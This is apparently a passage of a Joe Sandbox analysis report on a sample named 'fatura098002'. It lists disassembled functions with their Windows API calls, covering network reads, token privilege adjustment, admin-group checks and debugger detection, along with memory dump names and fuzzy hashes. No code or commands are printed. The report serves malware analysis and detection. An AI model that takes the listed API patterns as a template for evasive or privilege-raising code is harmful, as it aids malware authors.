Opcode Fuzzy Hash: 1eb86e18d7c6f1987e6ed55a673383b7b7c89f8a0e597056ba97414b236ac0da
Instruction Fuzzy Hash: 4431EBB0A40248BEFF35CA65CC05BFE77A6AB45310F04421BE98A665D1D37D8D81CB66

Function 00798FC9 Relevance: 6.1, APIs: 4, Instructions: 78nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

GetCursorPos.USER32(?), ref: 00799001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00757711,?,?,?,?,?), ref: 00799016
GetCursorPos.USER32(?), ref: 0079905E
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00757711,?,?,?), ref: 00799094

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: 68a329ee68990c4b9dd7a64c1f55bc81164c87c13ea0a7a47a863f5df506a0ca
Instruction ID: d3e2633b40c425041a3c917a70a464b6cd9413ea046a16da552c71f5ec5fc6dd
Opcode Fuzzy Hash: 68a329ee68990c4b9dd7a64c1f55bc81164c87c13ea0a7a47a863f5df506a0ca
Instruction Fuzzy Hash: CB21B135600018FFDF268F9DD858EEA7BB9EB49350F10405AF61547261C33AA9A1DB60

Function 0077CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0077CE89
GetLastError.KERNEL32(?,00000000), ref: 0077CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0077CEFE

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: ae832734f475c007cd2a6db3b87185dde56a0028015bedffc2715bbb11951ada
Instruction ID: eb442695a758b6e0d1b0ca8c09716d4c06b4c511bac1d311c00054659091bc36
Opcode Fuzzy Hash: ae832734f475c007cd2a6db3b87185dde56a0028015bedffc2715bbb11951ada
Instruction Fuzzy Hash: 4121EDB25003059BEF32CFA5C948BA677F8EB04384F10841EE54A92151E7B8EE458B64

Function 0076DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00745222), ref: 0076DBCE
GetFileAttributesW.KERNEL32(?), ref: 0076DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0076DBEE
FindClose.KERNEL32(00000000), ref: 0076DBFA

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 34bd34cb432a12316e8f779c23cbad8631aa0c8496fac84019faeaa36b4114b3
Instruction ID: d422385cfe6318e49c92ddcc0bca7532cf51438032b10b0e5ac425e928baefaa
Opcode Fuzzy Hash: 34bd34cb432a12316e8f779c23cbad8631aa0c8496fac84019faeaa36b4114b3
Instruction Fuzzy Hash: 72F0A0308209185BD631AB78AC0D8AA377CAF01334F508703F836C20E0EBB95D9686E9

Function 00732622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0073271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00732724
UnhandledExceptionFilter.KERNEL32(?), ref: 00732731

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e30e88d4cdefeeae84418ad91618db82d3ca05cfeb30840254b8d6f3f943f7e9
Instruction ID: 3771fb082489681d368f5fbca104276b4c1389ecfe6919453e10a5fd45f68121
Opcode Fuzzy Hash: e30e88d4cdefeeae84418ad91618db82d3ca05cfeb30840254b8d6f3f943f7e9
Instruction Fuzzy Hash: 8731B774911228ABCB21DF64DC8979DBBB8BF08310F5081DAE51CA7261E7349F818F95

Function 007751CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007751DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00775238
SetErrorMode.KERNEL32(00000000), ref: 007752A1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 473a5a3c1140dc1db39f4580d2be2112358487b58fba6051d42747f1f3870baf
Instruction ID: 621aca8f941c331f89beb534dabfc33664963163c32dcb3c7e2efb862c954dcc
Opcode Fuzzy Hash: 473a5a3c1140dc1db39f4580d2be2112358487b58fba6051d42747f1f3870baf
Instruction Fuzzy Hash: 42317F75A00518DFDB00DF54D888EADBBF4FF08314F088099E809AB3A2CB35E856CB51

Function 007616C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0071FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00720668
Part of subcall function 0071FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00720685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
GetLastError.KERNEL32 ref: 0076174A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 688ab2c7e11a2af2d3d108455951836201405ea8c1e7481a8d688757d5c3ed7b
Instruction ID: ed699c9636141066ca403db2def240ebcd55c35581e976961a8f8a71987fa6cb
Opcode Fuzzy Hash: 688ab2c7e11a2af2d3d108455951836201405ea8c1e7481a8d688757d5c3ed7b
Instruction Fuzzy Hash: 9411C1B2500304AFD7189F58EC8ADAAB7B9EB04714B24852EE45653281EB74FC418B24

Function 0076D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0076D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0076D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0076D650

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: bb98524314c2a037e66ebfea2f7b54807d89789ff4faa0a5565de0600314b546
Instruction ID: c72eb4ad336891608dff1efd019a5340a8fffdb25502bb4dcaa61d936398036d
Opcode Fuzzy Hash: bb98524314c2a037e66ebfea2f7b54807d89789ff4faa0a5565de0600314b546
Instruction Fuzzy Hash: 4F117C71E01228BBDB208F94DC45FAFBBBCEB45B50F108112F904E7290C2744A018BA5

Function 00761663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0076168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007616A1
FreeSid.ADVAPI32(?), ref: 007616B1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b51c31df177adaf2c17a87f3fa3e33aaca8ff2b8a7e1f5cef9605a1e06c66630
Instruction ID: ac7549ccc5c8ee9f817959462fdab2b6159ebb7ed2265c6e1d3a68305cadfecd
Opcode Fuzzy Hash: b51c31df177adaf2c17a87f3fa3e33aaca8ff2b8a7e1f5cef9605a1e06c66630
Instruction Fuzzy Hash: 0CF0F475950309FBDF00DFE4DD89AAEBBBCEB08604F508565EA01E2191E778AA448A54

Function 00724CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(007328E9,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000,?,007328E9), ref: 00724D09
TerminateProcess.KERNEL32(00000000,?,00724CBE,007328E9,007C88B8,0000000C,00724E15,007328E9,00000002,00000000,?,007328E9), ref: 00724D10
ExitProcess.KERNEL32 ref: 00724D22

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c4c23de33297f6b4fd376916e4c73c87be7253b85888fcf766d055e50fe0a77f
Instruction ID: ad93dfd98e904bbaec83f1b5e3db5a3aada71c04eb7a910d579deacfa29a106d
Opcode Fuzzy Hash: c4c23de33297f6b4fd376916e4c73c87be7253b85888fcf766d055e50fe0a77f
Instruction Fuzzy Hash: E9E0B631100558FFCF22AF64EE0AA583B69EB41B81F108019FD098B122CB3DDD42CA95

Function 0073C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0073C36C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: e8671d80d5a3547ef724e107a2a18657f37082548268ab696701adea05949073
Instruction ID: ef00b73fd7670f600e6999ebb2e887c027d71aa884a8dc4009e3b74cd24d58df
Opcode Fuzzy Hash: e8671d80d5a3547ef724e107a2a18657f37082548268ab696701adea05949073
Instruction Fuzzy Hash: 7A414972500218AFDB249FB9CC4DEBB7778EB84314F1042A9F905E7182E634AD81CB50

Function 0075D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0075D28C

Strings

X64, xrefs: 0075D2A8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 884a0ae5beef84997a172846a125f8bfdfae8039c52ab53cc3ea629b45af8732
Instruction ID: 289dc7a90460b9b40cd78efbc4d810168c1ad9b355f64e78208a615faadabef4
Opcode Fuzzy Hash: 884a0ae5beef84997a172846a125f8bfdfae8039c52ab53cc3ea629b45af8732
Instruction Fuzzy Hash: 98D0C9B480111DEECFA0CB90DC88DDDB37CBB04305F104152F506A2140DBB899498F20

Function 0072CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 283849418078bdb791a0669487d4446f73bbead05e4b0fc4b7b59ea055573895
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 0C024D72E002299FDF15CFA9D9806ADFBF1EF58314F25816AD919E7380D734AA41CB90

Function 0070CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#}, xrefs: 0070CF7F
Variable is not of type 'Object'., xrefs: 00750C40

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#}
API String ID: 0-2137504428
Opcode ID: 0955b70cd90d949cdbcde351065599cc48a85a5a24453ebea55721c38229bc2f
Instruction ID: 048f1b3eb16062c7b74ce798af5ce909c8943028fe5ae55286ce03ae5f3e36ae
Opcode Fuzzy Hash: 0955b70cd90d949cdbcde351065599cc48a85a5a24453ebea55721c38229bc2f
Instruction Fuzzy Hash: 3732B070900209DBDF15DF94C885AEDB7F5FF05304F248259E806AB2C2DB79AE4ACB61

Function 007197C0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952

GetParent.USER32(?), ref: 007573A3
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 0075742D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 292b8e8d59515e94cb39d64647f46d47681f6a6ce400cbac2b0e43ece5cc5549
Instruction ID: 071be1f8ed594750e433b60796cc637e46e8afb8141f7f8fab75822dc1d79c5c
Opcode Fuzzy Hash: 292b8e8d59515e94cb39d64647f46d47681f6a6ce400cbac2b0e43ece5cc5549
Instruction Fuzzy Hash: 7321BF30600144AFCB299F2CDC69DE93BA5EF4A374F144256FE254B2E2C3799D96EA40

Function 007768EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00776918
FindClose.KERNEL32(00000000), ref: 00776961

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 460175dbdd91e3766a7161b3a96baa42308eacbed68632a73404f4badd50098e
Instruction ID: 7bd91e504886c4c19ed825daf751acda940c09540675a6fb4bf825ac0dfd378e
Opcode Fuzzy Hash: 460175dbdd91e3766a7161b3a96baa42308eacbed68632a73404f4badd50098e
Instruction Fuzzy Hash: AD11AF71604601DFDB10CF29C488A16BBE0FF84328F04C69DE5698B2A6CB34FC05CB91

Function 007990A1 Relevance: 3.0, APIs: 2, Instructions: 44nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0075769C,?,?,?), ref: 00799111

Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007990F7

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

